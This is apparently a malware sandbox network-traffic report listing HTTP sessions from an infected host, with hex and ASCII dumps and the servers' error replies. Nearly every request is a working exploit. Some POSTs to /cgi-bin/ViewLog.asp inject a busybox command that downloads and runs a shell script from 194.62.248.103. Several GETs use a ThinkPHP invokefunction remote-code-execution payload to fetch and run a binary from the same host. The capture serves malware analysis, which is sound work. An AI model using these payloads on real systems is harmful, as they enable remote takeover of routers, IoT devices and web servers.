                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 35 33 30 37 62 35 63 26 23 34 36 3b 31 37 31 33 31 30 35 33 31 33 26 23 34 36 3b 34 62 38 35 37 64 33 64 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 65 35 33 30 37 62 35 63 26 23 34 36 3b 31 37 31 33 31 30 35 33 31 33 26 23 34 36 3b 34 62 38 35 37 64 33 64 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;e5307b5c&#46;1713105313&#46;4b857d3d<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;e5307b5c&#46;1713105313&#46;4b857d3d</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        106192.168.2.234480285.122.205.278080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:15.284665108 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        107192.168.2.233918631.160.154.788080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:15.294502974 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:15.606605053 CEST1289INHTTP/1.1 404 Not Found
                                                        Server: Mini web server 1.0 ZTE corp 2005.
                                                        Accept-Ranges: bytes
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Cache-Control: no-cache,no-store
                                                        Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 73 70 61 6e 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 73 70 61 6e 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 3c 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 49 46 5f 45 52 52 4f 52 53 54 52 3e 53 65 73 73 69 6f 6e 54 69 6d 65 6f 75 74 3c 2f 49 46 5f 45 52 52 4f 52 53 54 52 3e 0a 3c 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 0a 3c 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 0a 3c 2f 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69
                                                        Data Ascii: <html> <head><title>404 Not Found</title></head> <body bgcolor="#FFFFFF" text="#000000" link="#2020ff" vlink="#4040cc"> <h2>404 Not Found</h2><span>The requested URL was not found on this server.</span><div style="display:none"><ajax_response_xml_root><IF_ERRORSTR>SessionTimeout</IF_ERRORSTR><IF_ERRORPARAM>SUCC</IF_ERRORPARAM><IF_ERRORTYPE>SUCC</IF_ERRORTYPE></ajax_response_xml_root><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error i


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        108192.168.2.235554831.136.239.1008080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:15.301537991 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:16.291457891 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:18.243083000 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:22.306690931 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:30.241434097 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:45.855318069 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:18.874710083 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        109192.168.2.236057431.136.125.1178080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:15.302551985 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:16.291440010 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:18.243063927 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:22.306622028 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:30.241426945 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:45.855334044 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:18.874722958 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        110192.168.2.235494085.234.126.1028080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:15.384677887 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:15.784373045 CEST388INHTTP/1.1 404 Not Found
                                                        Date: Sun, 14 Apr 2024 22:35:14 GMT
                                                        Server: DNVRS-Webs
                                                        Cache-Control: no-cache
                                                        Content-Length: 166
                                                        Content-Type: text/html
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=60, max=99
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        111192.168.2.234037095.216.146.16480
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:15.511933088 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:15.829622984 CEST490INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Sun, 14 Apr 2024 14:35:15 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        112192.168.2.235199495.216.59.11280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:15.517626047 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:15.841576099 CEST339INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Sun, 14 Apr 2024 14:35:15 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        113192.168.2.236003895.217.188.380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:15.520606041 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
